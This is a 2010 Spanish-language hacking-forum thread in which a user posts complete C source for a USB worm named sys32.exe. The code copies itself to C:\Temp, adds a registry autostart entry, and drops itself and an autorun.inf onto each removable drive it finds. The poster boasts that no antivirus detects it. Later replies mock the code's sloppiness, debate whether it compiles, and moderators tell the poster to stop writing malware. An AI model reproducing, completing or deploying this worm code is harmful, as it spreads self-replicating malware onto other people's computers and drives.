elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Virus sys32.exe
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Virus sys32.exe  (Leído 9,215 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Virus sys32.exe
« en: 11 Junio 2010, 20:54 pm »

Buenas, despues de muxas preguntas aqui, me desconecte de internet, e intente acer algo facilito. Cree el virusaco "boot.exe", que es taan efectivo k consume todos los recursos del PC, y eso k era un simple gusano...
luego me encerre a jugar al Counter un tiempo... un dia le eche un vistazo al escritorio y vi a mi bonito Dev-Cpp sucio y desgastado... empeze a programar!!!

despues de 2 bonitas horas de prácticas, nacio SYS32.exe!!!!


os pongo el codigo para k le echeis un vistazo. es muy sencillo, no se como no lo hice antes....
Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. int a;
  5. FILE *fp;
  6. char nowdir [50];
  7. char usb [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
  8. char usb2 [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
  9.  
  10. int main ()
  11. {
  12.    GetModuleFileName (NULL, nowdir, 256);
  13.    CopyFile (nowdir, "C:\\Temp\\sys32.exe", 0);
  14.    registro ();
  15.    while (1)
  16.    {
  17.          pendrive ();
  18.  sleep (5);
  19.    }
  20. }
  21.  
  22. int registro ()
  23. {
  24.    HKEY hkey;
  25.    RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_SET_VALUE, &hkey);
  26.    RegSetValueEx(hkey,"run",0,REG_SZ,"C:\\Temp\\sys32.exe",50);
  27.    RegCloseKey(hkey);
  28. }
  29.  
  30. int pendrive ()
  31. {
  32.    for (a=0; a<=5; a++)
  33.    {
  34.        if (GetDriveType (usb [a])==2)
  35.        {
  36.             strcat (usb [a], "\\sys32.exe");
  37.             CopyFile (nowdir, usb [a], 0);
  38.  
  39.             strcat (usb2 [a], "\\autorun.inf");
  40.             fp=fopen (usb2 [a], "wb+");
  41.             fprintf (fp, "[autorun]\nopen=sys32.exe");
  42.             fclose (fp);
  43.             fp=fopen (usb2 [a], "rb+");
  44.        }
  45.    }
  46. }
  47.  

funciona asi:
1. Se copia a "C:\Temp".
2. Se añade al registro, en una llave en la que todos tienen permisos, pero en la que puedes hacer que se abra al inicio de sesión. La única pega es que solo se abre en la sesion en la que se abre.
3. Hace un bucle infinito comprobando si se enchufan pendrives. Si se enchufan, se copia a este sitio, y crea un autorun. Lo cierra para guardar cambios y lo abre para k no lo borres.

Lo mejor es que no lo detecta ningun antivirus (por ahora, pork sin querer lo mande a analizar a ESET. a ver cuanto dura).+


Importante: El code es mio, y sus ideas, pero he de recordar que "http://usuarios.multimania.es/inyx/Gusano%20basico.pdf" me enseño a copiarme al registro. Como veis, es completamente diferente.


En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #1 en: 11 Junio 2010, 21:03 pm »

"Completamente diferente", ¿diferente en qué?

Es exactamente igual a todos los "gusanos" que hay.

-¿Qué tal si no tengo una unidad C:?"
-¿Y si no tienes permisos para editar el registro?
-¿Y si tengo más unidades USB de las que pones en el vector de cadenas?


En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #2 en: 11 Junio 2010, 21:13 pm »

diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #3 en: 11 Junio 2010, 22:14 pm »

diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!

Disculpa, pero es la forma mas absurda que he visto para infectar pendrives, una forma patetica de buscar unidades... solo te doy un consejo, las APIs de Windows estan ahi por algo y no veo nada de original en esto... lo unico que veo es que debe de ser mas detectado que el Happy99.

Te recomiendo que te eduques bien sobre el tema antes de ponerte a programar malware.
En línea

Eternal Idol
Kernel coder
Moderador
***
Desconectado Desconectado

Mensajes: 5.969


Israel nunca torturó niños, ni lo volverá a hacer.


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #4 en: 11 Junio 2010, 22:16 pm »

ZarKerveros: yo te recomiendo que te pongas a aprender y practicar cosas utiles y constructivas.
« Última modificación: 11 Junio 2010, 22:19 pm por Eternal Idol » En línea

La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
-Ramc-


Desconectado Desconectado

Mensajes: 495



Ver Perfil
Re: Virus sys32.exe
« Respuesta #5 en: 11 Junio 2010, 22:24 pm »

Lo diferente es que este no le va a compilar, el main no va a encontrar las funciones.
En línea


Shhh... be vewy, vewy, quiet!  I'm hunting wabbits...
LA PANDILLA MAS GRANDE DE MI CIUDAD, SE LLAMA POLICIA NACIONAL.
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #6 en: 11 Junio 2010, 22:28 pm »

Lo diferente es que este no le va a compilar, el main no va a encontrar las funciones.

Jaja, +1, pero recuerda que usa su "bonito Dev-c++", con el todo se puede.  :xD
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Eternal Idol
Kernel coder
Moderador
***
Desconectado Desconectado

Mensajes: 5.969


Israel nunca torturó niños, ni lo volverá a hacer.


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #7 en: 11 Junio 2010, 22:28 pm »

En C compilaria me parece.
En línea

La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón
-Ramc-


Desconectado Desconectado

Mensajes: 495



Ver Perfil
Re: Virus sys32.exe
« Respuesta #8 en: 11 Junio 2010, 22:34 pm »

En C compilaria me parece.
Ya te me tiraste el chiste. jeje

En C++ no compila y en C lanza warnings, pero, compila.

Aunque yo odio ver que el compilador me lanze un warning así sea por el salto de línea al final del archivo. jajaja
En línea


Shhh... be vewy, vewy, quiet!  I'm hunting wabbits...
LA PANDILLA MAS GRANDE DE MI CIUDAD, SE LLAMA POLICIA NACIONAL.
Littlehorse
All the world's a stage
Moderador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: Virus sys32.exe
« Respuesta #9 en: 11 Junio 2010, 22:45 pm »

Si, igualmente es ideal usar prototipos porque en ciertos casos si serán necesarios. Ademas ayudan a la lectura del código.

Tienes que mejorar varias cosas en ese código, pero estoy de acuerdo con Eternal Idol; hay muchas cosas para hacer que te van a aportar mucho mas que programar malware. Basta con usar un poco el buscador.

Saludos
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines